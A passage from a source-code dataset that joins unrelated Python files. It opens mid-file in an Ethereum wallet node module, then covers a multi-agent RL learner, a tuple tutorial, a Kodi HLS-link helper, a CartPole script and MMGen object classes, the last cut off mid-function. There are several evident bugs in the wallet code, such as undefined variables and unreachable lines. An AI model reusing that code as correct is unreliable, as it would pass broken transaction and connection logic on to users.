contract_function, gas_price, gas_limit=None, value=0, nonce=None):\n tx = contract_function.buildTransaction(self.defaultTxDict(gas_price, gas_limit=gas_limit, value=value, nonce=nonce))\n self._sign_and_schedule(tx)\n\n\n def send_ether(self, destination, amount, gas_price, nonce=None):\n target = self.ens.resolve(destination) or destination\n tx_dict = self.build_send_tx(amount, target, gas_price, nonce=nonce)\n self._sign_and_schedule(tx)\n\n \n def send_erc20(self, token, destination, amount, gas_price, nonce=None):\n contract_fn = token.transfer(destination, token.convert_to_integer(amount))\n rx = self.push(contract_fn, gas_price, gas_limit=150000, value=0, nonce=nonce)\n return rx\n\n\n def build_send_tx(self, amt, recipient, gas_price, gas_limit=21000, nonce=None, data=b'', convert_wei=True):\n _nonce = nonce or self.next_nonce()\n\n if convert_wei:\n value = self.w3.toWei(amt, 'ether')\n else:\n value = amt\n\n return dict(\n chainId=int(self.network),\n nonce=_nonce,\n gasPrice=gas_price,\n gas=gas_limit,\n to=recipient,\n value=value,\n data=data\n )\n\n def defaultTxDict(self, gas_price, gas_limit=None, nonce=None, value=0):\n _nonce = nonce or self.next_nonce()\n\n txdict = dict(\n chainId=int(self.network),\n nonce=_nonce,\n gasPrice=int(gas_price),\n value=value\n ) \n if gas_limit:\n txdict['gas'] = gas_limit\n #debug(); pdb.set_trace()\n return txdict\n\n\n def next_nonce(self):\n '''\n Find next nonce (according to our internally kept txqueue)\n '''\n tx_count = self.w3.eth.getTransactionCount(self.credstick.address)\n pending_txs = [x for x in self.config.txqueue(self.network) if x['from'] == self.credstick.address] \n\n if len(pending_txs) > 0:\n sorted_txs = sorted(pending_txs, key=lambda x: x.nonce)\n return sorted_txs[0]['nonce'] + 1\n return tx_count \n\nimport threading\nfrom web3 import Web3\nfrom ens import ENS\nfrom shadowlands.block_listener import BlockListener\n#from web3.utils.threads import Timeout\nfrom shadowlands.sl_contract.erc20 import Erc20\nimport sys, os\nimport logging\n\nclass Connect():\n\n def __init__(self):\n self.w3 = None\n self._sai_pip = None\n\n self.thread_shutdown = False\n self.ns = None\n self.best_block = '...' \n self.blocks_behind = None\n self.erc20_balances = None\n self.syncing_hash = None \n self.heartbeat_thread = None\n self._ens_domain = None\n self._wei_balance = None\n self.network = None\n\n self.connection_type = None\n\n @property\n def network_name(self):\n if self.network is None:\n return None\n try:\n return self.NETWORKDICT[self.network]\n except KeyError:\n return str(self.network)\n\n @property\n def eth_balance(self):\n if self._wei_balance and self.w3 is not None:\n return self.w3.fromWei(self._wei_balance, 'ether')\n else:\n return None\n\n @property\n def ens_domain(self):\n if self.credstick:\n return self._ens_domain\n else:\n return None\n\n\n def cleanout_w3(self):\n self._localNode = None\n self.network = None\n self.syncing_hash = None\n self.ens = None\n self._ens_domain = None\n self.w3 = None\n\n for mod in ['web3', 'web3.auto', 'web3.auto.infura']:\n try:\n del(sys.modules[mod])\n except KeyError:\n pass\n\n\n def _update(self):\n w3 = self.w3_getter()\n # semaphore only allows one thread to wait on update\n self.update_sem.acquire(blocking=False)\n \n with self.update_lock:\n if self.credstick:\n self._wei_balance = w3.eth.getBalance(self.credstick.addressStr())\n self.erc20_balances = Erc20.balances(self, self.credstick.address)\n if self.network == '1':\n try:\n self.ens = ENS.fromWeb3(_w3)\n self._ens_domain = self.ens.name(self.credstick.addressStr())\n self.eth_price = w3.fromWei(self._sai_pip.eth_price(), 'ether')\n except BadFunctionCallOutput:\n self._ens_domain = 'Unknown'\n else:\n self._ens_domain = 'Unknown'\n\n #self.best_block = str(self.w3.eth.blockNumber)\n self.best_block = str(w3.eth.blockNumber)\n\n self.syncing_hash = w3.eth.syncing\n if self.syncing_hash not in (None, False):\n self.blocks_behind = self.syncing_hash['highestBlock'] - self.syncing_hash['currentBlock']\n else:\n self.blocks_behind = None\n\n self.update_sem.release()\n\n\n def _update_status(self):\n logging.debug(\"eth_node update_status\")\n\n try:\n #threading.Thread(target=self._update).start()\n self._update()\n except (Exception) as e:\n #logging.info(str(e.__traceback__))\n logging.info(\"eth_node _update_status: {}\".format(traceback.format_exc()))\n\n\n\n def is_connected_with(self, _w3, connection_type, _heart_rate, _bg_w3=None):\n if not _w3.isConnected():\n return False\n\n self.w3 = _w3\n\n self.network = self.w3.eth.chainId\n\n if self.network == 1 and self._sai_pip is None:\n self._sai_pip = SaiPip(self)\n\n self._heart_rate = _heart_rate\n self._connection_type = connection_type\n\n\n if self.network == 4:\n from web3.middleware import geth_poa_middleware\n self.w3.middleware_stack.inject(geth_poa_middleware, layer=0)\n\n try:\n self._update_status()\n except (StaleBlockchain):\n return False\n\n logging.debug(\"is connected with \" + connection_type + \" every \" + str(_heart_rate) + \" seconds.\")\n\n return True\n\n\n\n def connect_w3_local(self):\n self.cleanout_w3()\n from web3.auto import w3\n if self.is_connected_with(w3, 'Local node', 3):\n self.config.default_method = self.connect_w3_local.__name__\n return True\n return False\n\n\n def connect_w3_websocket(self, uri=None, kwargs={}):\n self.cleanout_w3()\n from web3 import Web3\n return Web3(Web3.WebsocketProvider(uri, websocket_kwargs=kwargs))\n\n def connect_w3_custom_infura(self):\n args = self.config.connection_args\n proj_id = args[0] \n proj_secret = args[1]\n uri = f\"wss://:{proj_secret}@ropsten.infura.io/ws/v3/{proj_id}\"\n return self.w3_websocket(uri)\n\n # if no connection, wipe the config\n if self.is_connected_with(w3, 'Custom infura', 18):\n self.config.connection_strategy = None\n return True\n return False\n\n\n def connect_w3_custom_ipc(self, path=None):\n self.cleanout_w3()\n from web3 import Web3\n if not path:\n path = self.config.ipc_path\n w3 = Web3(Web3.IPCProvider(path))\n if self.is_connected_with(w3, 'Custom IPC', 3):\n self.config.ipc_path = path\n self.config.default_method = self.connect_w3_custom_ipc.__name__\n return True\n return False\n\n\n def connect_w3_custom_http(self, custom_uri=None):\n self.cleanout_w3()\n from web3 import Web3\n if not custom_uri:\n custom_uri = self.config.http_uri\n w3 = Web3(Web3.HTTPProvider(custom_uri))\n if self.is_connected_with(w3, 'Custom HTTP', 3):\n self.config.http_uri = custom_uri\n self.config.default_method = self.connect_w3_custom_http.__name__\n return True\n return False\n\n\n def connect_w3_gethdev_poa(self):\n self.cleanout_w3()\n from web3.auto.gethdev import w3\n if self.is_connected_with(w3, 'Gethdev PoA', 2):\n self.config.default_method = self.connect_w3_gethdev_poa.__name__\n return True\n return False\n\n def w3_getter(self):\n return self.bg_w3\n\n def poll(self):\n # (ConnectionError, AttributeError, Timeout, InvalidStatusCode, ConnectionClosed, TimeoutError, OSError, StaleBlockchain, ValueError)\n logging.debug(\"eth_node poll()\")\n w3 = self.w3_getter()\n self._update_status()\n logging.debug(\"eth_node poll() finished\")\n\n\n def heartbeat(self):\n block_listener = BlockListener(self, self.config)\n schedule.every(15).to(20).seconds.do(self.poll)\n schedule.every(15).to(20).seconds.do(block_listener.listen)\n while True:\n if not self.ensure_w3():\n sleep(.3)\n continue\n schedule.run_pending()\n if self.thread_shutdown:\n logging.debug(\"eth_node thread_shutdown\")\n return\n sleep(.3)\n\n def ensure_w3(self):\n try:\n if self.bg_w3().isConnected():\n return True\n fn = self.__getattribute__(self.config.connection_strategy)\n except (AttributeError, TypeError):\n logging.debug(\"eth_node thread_shutdown\")\n return fn()\n\n \n def start_heartbeat_thread(self):\n logging.debug(\"eth_node start_heartbeat_thread()\")\n self.heartbeat_thread = threading.Thread(target=self.heartbeat)\n self.heartbeat_thread.start()\n\n\n def stop_thread(self):\n logging.debug(\"eth_node stop_thread()\")\n\n if self.heartbeat_thread is not None:\n self.thread_shutdown = True\n self.heartbeat_thread.join()\n\n\n\n\n","repo_name":"kayagoban/shadowlands","sub_path":"shadowlands/sl_node.py","file_name":"sl_node.py","file_ext":"py","file_size_in_byte":11718,"program_lang":"python","lang":"en","doc_type":"code","stars":142,"dataset":"github-code","pt":"52"} +{"seq_id":"17194387225","text":"\"\"\"\nDCG: Deep coordination graphs\nPaper link: http://proceedings.mlr.press/v119/boehmer20a/boehmer20a.pdf\nImplementation: Pytorch\nCreator: Wenzhang Liu (liu_wzh@foxmail.com)\n\"\"\"\nfrom xuance_torch.learners import *\nimport torch_scatter\n\n\nclass DCG_Learner(LearnerMAS):\n def __init__(self,\n config: Namespace,\n policy: nn.Module,\n optimizer: torch.optim.Optimizer,\n scheduler: Optional[torch.optim.lr_scheduler._LRScheduler] = None,\n summary_writer: Optional[SummaryWriter] = None,\n device: Optional[Union[int, str, torch.device]] = None,\n modeldir: str = \"./\",\n gamma: float = 0.99,\n sync_frequency: int = 100\n ):\n self.gamma = gamma\n self.sync_frequency = sync_frequency\n self.mse_loss = nn.MSELoss()\n super(DCG_Learner, self).__init__(config, policy, optimizer, scheduler, summary_writer, device, modeldir)\n\n def get_graph_values(self, obs_n, use_target_net=False):\n if use_target_net:\n hidden_states = self.policy.representation(obs_n)['state']\n utilities = self.policy.target_utility(hidden_states)\n payoff = self.policy.target_payoffs(hidden_states, self.policy.graph.edges_from, self.policy.graph.edges_to)\n else:\n hidden_states = self.policy.representation(obs_n)['state']\n utilities = self.policy.utility(hidden_states)\n payoff = self.policy.payoffs(hidden_states, self.policy.graph.edges_from, self.policy.graph.edges_to)\n return utilities, payoff\n\n def q_dcg(self, obs_n, actions, states=None, use_target_net=False):\n f_i, f_ij = self.get_graph_values(obs_n, use_target_net)\n f_i_mean = f_i.double() / self.policy.graph.n_vertexes\n f_ij_mean = f_ij.double() / self.policy.graph.n_edges\n utilities = f_i_mean.gather(-1, actions.unsqueeze(dim=-1).long()).sum(dim=1)\n if len(self.policy.graph.edges) == 0 or self.args.n_msg_iterations == 0:\n return utilities\n actions_ij = (actions[:, self.policy.graph.edges_from] * self.dim_act + actions[:, self.policy.graph.edges_to]).unsqueeze(-1)\n payoffs = f_ij_mean.view(list(f_ij_mean.shape[0:-2]) + [-1]).gather(-1, actions_ij.long()).sum(dim=1)\n if self.args.agent == \"DCG_S\":\n state_value = self.policy.bias(states)\n return utilities + payoffs + state_value\n else:\n return utilities + payoffs\n\n def act(self, obs_n, episode=None, test_mode=True, noise=False):\n obs_n = torch.Tensor(obs_n).to(self.device)\n with torch.no_grad():\n f_i, f_ij = self.get_graph_values(obs_n)\n n_edges = self.policy.graph.n_edges\n n_vertexes = self.policy.graph.n_vertexes\n f_i_mean = f_i.double() / n_vertexes\n f_ij_mean = f_ij.double() / n_edges\n f_ji_mean = f_ij_mean.transpose(dim0=-1, dim1=-2).clone()\n batch_size = f_i.shape[0]\n\n msg_ij = torch.zeros(batch_size, n_edges, self.dim_act).to(self.device) # i -> j (send)\n msg_ji = torch.zeros(batch_size, n_edges, self.dim_act).to(self.device) # j -> i (receive)\n #\n msg_forward = torch_scatter.scatter_add(src=msg_ij, index=self.policy.graph.edges_to, dim=1, dim_size=n_vertexes)\n msg_backward = torch_scatter.scatter_add(src=msg_ji, index=self.policy.graph.edges_from, dim=1, dim_size=n_vertexes)\n utility = f_i_mean + msg_forward + msg_backward\n if len(self.policy.graph.edges) == 0:\n return utility.argmax(dim=-1).cpu().numpy()\n else:\n for i in range(self.args.n_msg_iterations):\n joint_forward = (utility[:, self.policy.graph.edges_from, :] - msg_ji).unsqueeze(dim=-1) + f_ij_mean\n joint_backward = (utility[:, self.policy.graph.edges_to, :] - msg_ij).unsqueeze(dim=-1) + f_ji_mean\n msg_ij = joint_forward.max(dim=-2).values\n msg_ji = joint_backward.max(dim=-2).values\n if self.args.msg_normalized:\n msg_ij -= msg_ij.mean(dim=-1, keepdim=True)\n msg_ji -= msg_ji.mean(dim=-1, keepdim=True)\n\n msg_forward = torch_scatter.scatter_add(src=msg_ij, index=self.policy.graph.edges_to, dim=1,\n dim_size=n_vertexes)\n msg_backward = torch_scatter.scatter_add(src=msg_ji, index=self.policy.graph.edges_from, dim=1,\n dim_size=n_vertexes)\n utility = f_i_mean + msg_forward + msg_backward\n return utility.argmax(dim=-1).cpu().numpy()\n\n def update(self, sample):\n self.iterations += 1\n state = torch.Tensor(sample['state']).to(self.device)\n obs = torch.Tensor(sample['obs']).to(self.device)\n actions = torch.Tensor(sample['actions']).to(self.device)\n state_next = torch.Tensor(sample['state_next']).to(self.device)\n obs_next = torch.Tensor(sample['obs_next']).to(self.device)\n rewards = torch.Tensor(sample['rewards']).mean(dim=1).to(self.device)\n terminals = torch.Tensor(sample['terminals']).float().view(-1, self.n_agents, 1).to(self.device)\n agent_mask = torch.Tensor(sample['agent_mask']).float().view(-1, self.n_agents, 1).to(self.device)\n IDs = torch.eye(self.n_agents).unsqueeze(0).expand(self.args.batch_size, -1, -1).to(self.device)\n\n q_eval_a = self.q_dcg(obs, actions, states=state, use_target_net=False)\n with torch.no_grad():\n action_next_greedy = torch.Tensor(self.act(obs_next.cpu())).to(self.device)\n q_next_a = self.q_dcg(obs_next, action_next_greedy, states=state_next, use_target_net=True)\n\n if self.args.consider_terminal_states:\n q_target = rewards + (1-terminals) * self.args.gamma * q_next_a\n else:\n q_target = rewards + self.args.gamma * q_next_a\n\n # calculate the loss function\n loss = self.mse_loss(q_eval_a, q_target.detach())\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n if self.scheduler is not None:\n self.scheduler.step()\n\n if self.iterations % self.sync_frequency == 0:\n self.policy.copy_target()\n lr = self.optimizer.state_dict()['param_groups'][0]['lr']\n self.writer.add_scalar(\"learning_rate\", lr, self.iterations)\n self.writer.add_scalar(\"loss_Q\", loss.item(), self.iterations)\n self.writer.add_scalar(\"predictQ\", q_eval_a.mean().item(), self.iterations)\n","repo_name":"JoegameZhou/XuanPolicy","sub_path":"xuance_torch/learners/multi_agent_rl/dcg_learner.py","file_name":"dcg_learner.py","file_ext":"py","file_size_in_byte":6651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27135540287","text":"#Declaração de Tuplas, lembrando que tuplas nao podem ser editadas a menos que virem listas\nt1 = (1,2,3, 'warley', 'souza', 3.4, 'henrique')\nt2 = 1,2,3, 'warley', 'souza', 3.4, 'henrique'\nt3 = 1,\n# print(type(t1))\n# print(type(t2))\n# print(type(t3))\n\n#transformando a tupla em lista para edita-la\nt1 = list(t1)\n\n#editando a lista\nt1[3] = 'warley henrique de souza'\n\n#Comando pop para apagar um item da lista, passando o argumento \nt1.pop(4)\nt1.pop(5)\n\nprint(t1)","repo_name":"warleyzee/python","sub_path":"funcoes/tupla.py","file_name":"tupla.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"294176907","text":"import re, json, base64\nfrom urlparse import urlparse\nfrom utils.mozie_request import Request, AsyncRequest\nfrom utils.pastebin import PasteBin\nfrom urllib import urlencode\n\n\ndef get_link(url, movie):\n base_url = urlparse(url)\n base_url = base_url.scheme + '://' + base_url.netloc\n\n try:\n mid = re.search(r'\\?id=(.*)&keyaction', url).group(1)\n hosturl = '%s/hls/%s/%s.playlist.m3u8' % (base_url, mid, mid)\n\n header = {\n 'Origin': base_url,\n 'User-Agent': \"Chrome/59.0.3071.115 Safari/537.36\",\n 'Referrer': url\n }\n return hosturl + \"|%s\" % urlencode(header), 'hls5'\n except:\n pass\n\n return url, 'hls5'\n","repo_name":"vibox/vibox.vn","sub_path":"plugin.video.bimozie/resources/lib/utils/hosts/toolpg.py","file_name":"toolpg.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44429362082","text":"\"\"\"\nCode taken from the following source, and altered:\n__name__ = predict.py\n__author__ = Yash Patel\n__description__ =\nFull prediction code of OpenAI Cartpole environment using Keras\n\"\"\"\n\nimport gym\nimport numpy as np\n\nfrom model import create_model\nfrom data import gather_data\n\n\ndef predict():\n\n # initializing the (stateful) environment\n # where is the perfect functional immutable\n # environment when you need it\n env = gym.make(\"CartPole-v0\")\n\n # EVERYTHING IS SUPERVISED LEARNING\n # EVEN WHEN IT IS NOT\n trainingX, trainingY = gather_data(env)\n # reminder to self: model is also stateful\n # also reminder to self: sit down and cry\n model = create_model()\n # change the STATE of the MODEL yes\n # TRAIN IT LIKE THAT WHY NOT\n model.fit(trainingX, trainingY, epochs=5)\n\n scores = []\n num_trials = 50\n sim_steps = 500\n for _ in range(num_trials):\n observation = env.reset()\n score = 0\n for step in range(sim_steps):\n action = np.argmax(model.predict(observation.reshape(1, 4)))\n observation, reward, done, _ = env.step(action)\n score += reward\n if done:\n break\n scores.append(score)\n\n print(np.mean(scores))\n\n\nif __name__ == \"__main__\":\n predict()\n","repo_name":"AdLucem/topics-in-ml-project","sub_path":"cart_pole.py","file_name":"cart_pole.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24499937559","text":"import sys,os,unicodedata\nfrom decimal import *\nfrom string import hexdigits,ascii_letters,digits\n\nfrom .exception import *\nfrom .globalvars import *\nfrom .color import *\n\nclass aInitMeta(type):\n\tasync def __call__(cls,*args,**kwargs):\n\t\tinstance = super().__call__(*args,**kwargs)\n\t\tawait instance.__ainit__(*args,**kwargs)\n\t\treturn instance\n\ndef get_obj(objname,*args,**kwargs):\n\t\"\"\"\n\tWrapper for data objects\n\t- If the object throws an exception on instantiation, return False, otherwise return the object.\n\t- If silent is True, suppress display of the exception.\n\t- If return_bool is True, return True instead of the object.\n\tOnly keyword args are accepted.\n\t\"\"\"\n\tassert args == (), 'get_obj_chk1'\n\n\tsilent,return_bool = (False,False)\n\tif 'silent' in kwargs:\n\t\tsilent = kwargs['silent']\n\t\tdel kwargs['silent']\n\tif 'return_bool' in kwargs:\n\t\treturn_bool = kwargs['return_bool']\n\t\tdel kwargs['return_bool']\n\n\ttry:\n\t\tret = objname(**kwargs)\n\texcept Exception as e:\n\t\tif not silent:\n\t\t\tfrom .util import msg\n\t\t\tmsg(f'{e!s}')\n\t\treturn False\n\telse:\n\t\treturn True if return_bool else ret\n\ndef is_mmgen_seed_id(s): return get_obj(SeedID, sid=s, silent=True,return_bool=True)\ndef is_mmgen_idx(s): return get_obj(AddrIdx, n=s, silent=True,return_bool=True)\ndef is_addrlist_id(s): return get_obj(AddrListID, sid=s, silent=True,return_bool=True)\ndef is_seed_split_specifier(s): return get_obj(SeedSplitSpecifier, s=s, silent=True,return_bool=True)\n\ndef is_mmgen_id(proto,s): return get_obj(MMGenID, proto=proto, id_str=s, silent=True,return_bool=True)\ndef is_coin_addr(proto,s): return get_obj(CoinAddr, proto=proto, addr=s, silent=True,return_bool=True)\ndef is_wif(proto,s): return get_obj(WifKey, proto=proto, wif=s, silent=True,return_bool=True)\n\ndef truncate_str(s,width): # width = screen width\n\twide_count = 0\n\tfor i in range(len(s)):\n\t\twide_count += unicodedata.east_asian_width(s[i]) in ('F','W')\n\t\tif wide_count + i >= width:\n\t\t\treturn s[:i] + ('',' ')[\n\t\t\t\tunicodedata.east_asian_width(s[i]) in ('F','W')\n\t\t\t\tand wide_count + i == width]\n\telse: # pad the string to width if necessary\n\t\treturn s + ' '*(width-len(s)-wide_count)\n\n# dict that keeps a list of keys for efficient lookup by index\nclass IndexedDict(dict):\n\n\tdef __init__(self,*args,**kwargs):\n\t\tif args or kwargs:\n\t\t\tself.die('initializing values via constructor')\n\t\tself.__keylist = []\n\t\treturn dict.__init__(self,*args,**kwargs)\n\n\tdef __setitem__(self,key,value):\n\t\tif key in self:\n\t\t\tself.die('reassignment to existing key')\n\t\tself.__keylist.append(key)\n\t\treturn dict.__setitem__(self,key,value)\n\n\t@property\n\tdef keys(self):\n\t\treturn self.__keylist\n\n\tdef key(self,idx):\n\t\treturn self.__keylist[idx]\n\n\tdef __delitem__(self,*args): self.die('item deletion')\n\tdef move_to_end(self,*args): self.die('item moving')\n\tdef clear(self,*args): self.die('clearing')\n\tdef update(self,*args): self.die('updating')\n\n\tdef die(self,desc):\n\t\traise NotImplementedError(f'{desc} not implemented for type {type(self).__name__}')\n\nclass MMGenList(list,MMGenObject): pass\nclass MMGenDict(dict,MMGenObject): pass\nclass AddrListData(list,MMGenObject): pass\n\nclass InitErrors:\n\n\t@classmethod\n\tdef init_fail(cls,e,m,e2=None,m2=None,objname=None,preformat=False):\n\n\t\tif preformat:\n\t\t\terrmsg = m\n\t\telse:\n\t\t\terrmsg = '{!r}: value cannot be converted to {} {}({!s})'.format(\n\t\t\t\tm,\n\t\t\t\t(objname or cls.__name__),\n\t\t\t\t(f'({e2!s}) ' if e2 else ''),\n\t\t\t\te )\n\n\t\tif m2:\n\t\t\terrmsg = repr(m2) + '\\n' + errmsg\n\n\t\tif hasattr(cls,'passthru_excs') and type(e) in cls.passthru_excs:\n\t\t\traise\n\t\telif hasattr(cls,'exc'):\n\t\t\traise cls.exc(errmsg)\n\t\telse:\n\t\t\traise ObjectInitError(errmsg)\n\n\t@classmethod\n\tdef method_not_implemented(cls):\n\t\timport traceback\n\t\traise NotImplementedError(\n\t\t\t'method {!r} not implemented for class {!r}'.format(\n\t\t\t\ttraceback.extract_stack()[-2].name, cls.__name__) )\n\nclass Hilite(object):\n\n\tcolor = 'red'\n\twidth = 0\n\ttrunc_ok = True\n\n\t@classmethod\n\t# 'width' is screen width (greater than len(s) for CJK strings)\n\t# 'append_chars' and 'encl' must consist of single-width chars only\n\tdef fmtc(cls,s,width=None,color=False,encl='',trunc_ok=None,\n\t\t\t\tcenter=False,nullrepl='',append_chars='',append_color=False):\n\t\ts_wide_count = len([1 for ch in s if unicodedata.east_asian_width(ch) in ('F','W')])\n\t\tif encl:\n\t\t\ta,b = list(encl)\n\t\t\tadd_len = len(append_chars) + 2\n\t\telse:\n\t\t\ta,b = ('','')\n\t\t\tadd_len = len(append_chars)\n\t\tif width == None:\n\t\t\twidth = cls.width\n\t\tif trunc_ok == None:\n\t\t\ttrunc_ok = cls.trunc_ok\n\t\tif g.test_suite:\n\t\t\tassert isinstance(encl,str) and len(encl) in (0,2),\"'encl' must be 2-character str\"\n\t\t\tassert width >= 2 + add_len, f'{s!r}: invalid width ({width}) (must be at least 2)' # CJK: 2 cells\n\t\tif len(s) + s_wide_count + add_len > width:\n\t\t\tassert trunc_ok, \"If 'trunc_ok' is false, 'width' must be >= screen width of string\"\n\t\t\ts = truncate_str(s,width-add_len)\n\t\tif s == '' and nullrepl:\n\t\t\ts = nullrepl.center(width)\n\t\telse:\n\t\t\ts = a+s+b\n\t\t\tif center:\n\t\t\t\ts = s.center(width)\n\t\tif append_chars:\n\t\t\treturn (\n\t\t\t\tcls.colorize(s,color=color)\n\t\t\t\t+ cls.colorize(\n\t\t\t\t\tappend_chars.ljust(width-len(s)-s_wide_count),\n\t\t\t\t\tcolor_override = append_color ))\n\t\telse:\n\t\t\treturn cls.colorize(s.ljust(width-s_wide_count),color=color)\n\n\t@classmethod\n\tdef colorize(cls,s,color=True,color_override=''):\n\t\treturn globals()[color_override or cls.color](s) if color else s\n\n\tdef fmt(self,*args,**kwargs):\n\t\tassert args == () # forbid invocation w/o keywords\n\t\treturn self.fmtc(self,*args,**kwargs)\n\n\t@classmethod\n\tdef hlc(cls,s,color=True,encl=''):\n\t\tif encl:\n\t\t\tassert isinstance(encl,str) and len(encl) == 2, \"'encl' must be 2-character str\"\n\t\t\ts = encl[0] + s + encl[1]\n\t\treturn cls.colorize(s,color=color)\n\n\tdef hl(self,*args,**kwargs):\n\t\tassert args == () # forbid invocation w/o keywords\n\t\treturn self.hlc(self,*args,**kwargs)\n\nclass Str(str,Hilite): pass\n\nclass Int(int,Hilite,InitErrors):\n\tmin_val = None\n\tmax_val = None\n\tmax_digits = None\n\tcolor = 'red'\n\n\tdef __new__(cls,n,base=10):\n\t\tif type(n) == cls:\n\t\t\treturn n\n\t\ttry:\n\t\t\tme = int.__new__(cls,str(n),base)\n\t\t\tif cls.min_val != None:\n\t\t\t\tassert me >= cls.min_val, f'is less than cls.min_val ({cls.min_val})'\n\t\t\tif cls.max_val != None:\n\t\t\t\tassert me <= cls.max_val, f'is greater than cls.max_val ({cls.max_val})'\n\t\t\tif cls.max_digits != None:\n\t\t\t\tassert len(str(me)) <= cls.max_digits, f'has more than {cls.max_digits} digits'\n\t\t\treturn me\n\t\texcept Exception as e:\n\t\t\treturn cls.init_fail(e,n)\n\n\t@classmethod\n\tdef fmtc(cls,*args,**kwargs):\n\t\tcls.method_not_implemented()\n\n\t@classmethod\n\tdef colorize(cls,n,color=True):\n\t\treturn super().colorize(repr(n),color=color)\n\nclass ImmutableAttr: # Descriptor\n\t\"\"\"\n\tFor attributes that are always present in the data instance\n\tReassignment and deletion forbidden\n\t\"\"\"\n\tok_dtypes = (str,type,type(None),type(lambda:0))\n\n\tdef __init__(self,dtype,typeconv=True,set_none_ok=False,include_proto=False):\n\t\tassert isinstance(dtype,self.ok_dtypes), 'ImmutableAttr_check1'\n\t\tif include_proto:\n\t\t\tassert typeconv and type(dtype) == str, 'ImmutableAttr_check2'\n\t\tif set_none_ok:\n\t\t\tassert typeconv and type(dtype) != str, 'ImmutableAttr_check3'\n\n\t\tif dtype is None:\n\t\t\t'use instance-defined conversion function for this attribute'\n\t\t\tself.conv = lambda instance,value: getattr(instance.conv_funcs,self.name)(instance,value)\n\t\telif typeconv:\n\t\t\t\"convert this attribute's type\"\n\t\t\tif type(dtype) == str:\n\t\t\t\tif include_proto:\n\t\t\t\t\tself.conv = lambda instance,value: globals()[dtype](instance.proto,value)\n\t\t\t\telse:\n\t\t\t\t\tself.conv = lambda instance,value: globals()[dtype](value)\n\t\t\telse:\n\t\t\t\tif set_none_ok:\n\t\t\t\t\tself.conv = lambda instance,value: None if value is None else dtype(value)\n\t\t\t\telse:\n\t\t\t\t\tself.conv = lambda instance,value: dtype(value)\n\t\telse:\n\t\t\t\"check this attribute's type\"\n\t\t\tdef assign_with_check(instance,value):\n\t\t\t\tif type(value) == dtype:\n\t\t\t\t\treturn value\n\t\t\t\traise TypeError('Attribute {!r} of {} instance must of type {}'.format(\n\t\t\t\t\tself.name,\n\t\t\t\t\ttype(instance).__name__,\n\t\t\t\t\tdtype ))\n\t\t\tself.conv = assign_with_check\n\n\tdef __set_name__(self,owner,name):\n\t\tself.name = name\n\n\tdef __get__(self,instance,owner):\n\t\treturn instance.__dict__[self.name]\n\n\tdef setattr_condition(self,instance):\n\t\t'forbid all reassignment'\n\t\treturn not self.name in instance.__dict__\n\n\tdef __set__(self,instance,value):\n\t\tif not self.setattr_condition(instance):\n\t\t\traise AttributeError(f'Attribute {self.name!r} of {type(instance)} instance cannot be reassigned')\n\t\tinstance.__dict__[self.name] = self.conv(instance,value)\n\n\tdef __delete__(self,instance):\n\t\traise AttributeError(\n\t\t\tf'Attribute {self.name!r} of {type(instance).__name__} instance cannot be deleted')\n\nclass ListItemAttr(ImmutableAttr):\n\t\"\"\"\n\tFor attributes that might not be present in the data instance\n\tReassignment or deletion allowed if specified\n\t\"\"\"\n\tdef __init__(self,dtype,typeconv=True,include_proto=False,reassign_ok=False,delete_ok=False):\n\t\tself.reassign_ok = reassign_ok\n\t\tself.delete_ok = delete_ok\n\t\tImmutableAttr.__init__(self,dtype,typeconv=typeconv,include_proto=include_proto)\n\n\tdef __get__(self,instance,owner):\n\t\t\"return None if attribute doesn't exist\"\n\t\ttry: return instance.__dict__[self.name]\n\t\texcept: return None\n\n\tdef setattr_condition(self,instance):\n\t\treturn getattr(instance,self.name) == None or self.reassign_ok\n\n\tdef __delete__(self,instance):\n\t\tif self.delete_ok:\n\t\t\tif self.name in instance.__dict__:\n\t\t\t\tdel instance.__dict__[self.name]\n\t\telse:\n\t\t\tImmutableAttr.__delete__(self,instance)\n\nclass MMGenListItem(MMGenObject):\n\tvalid_attrs = set()\n\tvalid_attrs_extra = set()\n\tinvalid_attrs = {\n\t\t'pfmt',\n\t\t'pmsg',\n\t\t'pdie',\n\t\t'valid_attrs',\n\t\t'valid_attrs_extra',\n\t\t'invalid_attrs',\n\t\t'immutable_attr_init_check',\n\t\t'conv_funcs',\n\t\t'_asdict',\n\t}\n\n\tdef __init__(self,*args,**kwargs):\n\t\t# generate valid_attrs, or use the class valid_attrs if set\n\t\tself.__dict__['valid_attrs'] = self.valid_attrs or (\n\t\t\t\t( {e for e in dir(self) if e[:2] != '__'} | self.valid_attrs_extra )\n\t\t\t\t- MMGenListItem.invalid_attrs\n\t\t\t\t- self.invalid_attrs\n\t\t\t)\n\n\t\tif args:\n\t\t\traise ValueError(f'Non-keyword args not allowed in {type(self).__name__!r} constructor')\n\n\t\tfor k,v in kwargs.items():\n\t\t\tif v != None:\n\t\t\t\tsetattr(self,k,v)\n\n\t\t# Require all immutables to be initialized. Check performed only when testing.\n\t\tself.immutable_attr_init_check()\n\n\t# allow only valid attributes to be set\n\tdef __setattr__(self,name,value):\n\t\tif name not in self.valid_attrs:\n\t\t\traise AttributeError(f'{name!r}: no such attribute in class {type(self)}')\n\t\treturn object.__setattr__(self,name,value)\n\n\tdef _asdict(self):\n\t\treturn dict((k,v) for k,v in self.__dict__.items() if k in self.valid_attrs)\n\nclass MMGenIdx(Int): min_val = 1\nclass SeedShareIdx(MMGenIdx): max_val = 1024\nclass SeedShareCount(SeedShareIdx): min_val = 2\nclass MasterShareIdx(MMGenIdx): max_val = 1024\nclass AddrIdx(MMGenIdx): max_digits = 7\n\nclass AddrIdxList(list,InitErrors,MMGenObject):\n\tmax_len = 1000000\n\tdef __init__(self,fmt_str=None,idx_list=None,sep=','):\n\t\ttry:\n\t\t\tif idx_list:\n\t\t\t\treturn list.__init__(self,sorted({AddrIdx(i) for i in idx_list}))\n\t\t\telif fmt_str:\n\t\t\t\tret = []\n\t\t\t\tfor i in (fmt_str.split(sep)):\n\t\t\t\t\tj = i.split('-')\n\t\t\t\t\tif len(j) == 